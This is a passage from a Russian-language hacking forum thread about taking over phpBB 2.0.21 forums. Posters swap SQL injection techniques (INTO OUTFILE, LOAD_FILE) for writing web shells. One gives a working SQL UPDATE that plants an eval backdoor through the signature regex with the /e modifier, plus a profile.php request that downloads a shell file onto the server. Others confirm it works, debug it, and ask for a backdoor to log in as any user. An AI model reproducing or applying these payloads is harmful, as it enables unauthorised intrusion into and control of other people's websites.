Схожая проблема, только чуть сложнее 2.0.21 чистый (без модов). Админка есть нулевой байт экранируется мускуль-иньекция в скрипте ЦМС (не пхпбб) чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД (оказалось что иногда криворукость помогает)))) Не пойму другого: стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x Сервер мне только выдает строку в странице ту что после select но в файл не выводит LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента. Можно что то еще сделать по этим признакам? спасибо ЗЫ Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд!
Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)
проще всего залить шелл: создаем 1.sql cо следующим содержанием: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2; далее: profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php'); Всё готово
Спасибо, залился. Всё перепробовал что только можно, а сделал как тут указано и всё ок. П.С поэтому апнул тему...
Добавляю сигнатуру, захожу в профиль и вижу код, есесно, не выполняется. посмотрел соурсы движка PHP: $signature = ($this_userdata['user_sig_bbcode_uid'] != '') ? preg_replace('#:' . $this_userdata['user_sig_bbcode_uid'] . '#si', '', $this_userdata['user_sig']) : $this_userdata['user_sig']; $signature = preg_replace($html_entities_match, $html_entities_replace, $signature); Видно, что регулярка идет не через "/", а через "#" заменил (.+)/e на (.+)#e - ошибка исчезла, но код не выполняется.
Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись, код не выполняется (( Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
да) ну тогда спортивный вопрос, как сессию держать в гете? не хочешь не надо) но я его всё равно добью.
когда заходишь на профиль сессия в параметре GET передается profile.php?u=2&c=md5_hash_of_session ее убирать не нужно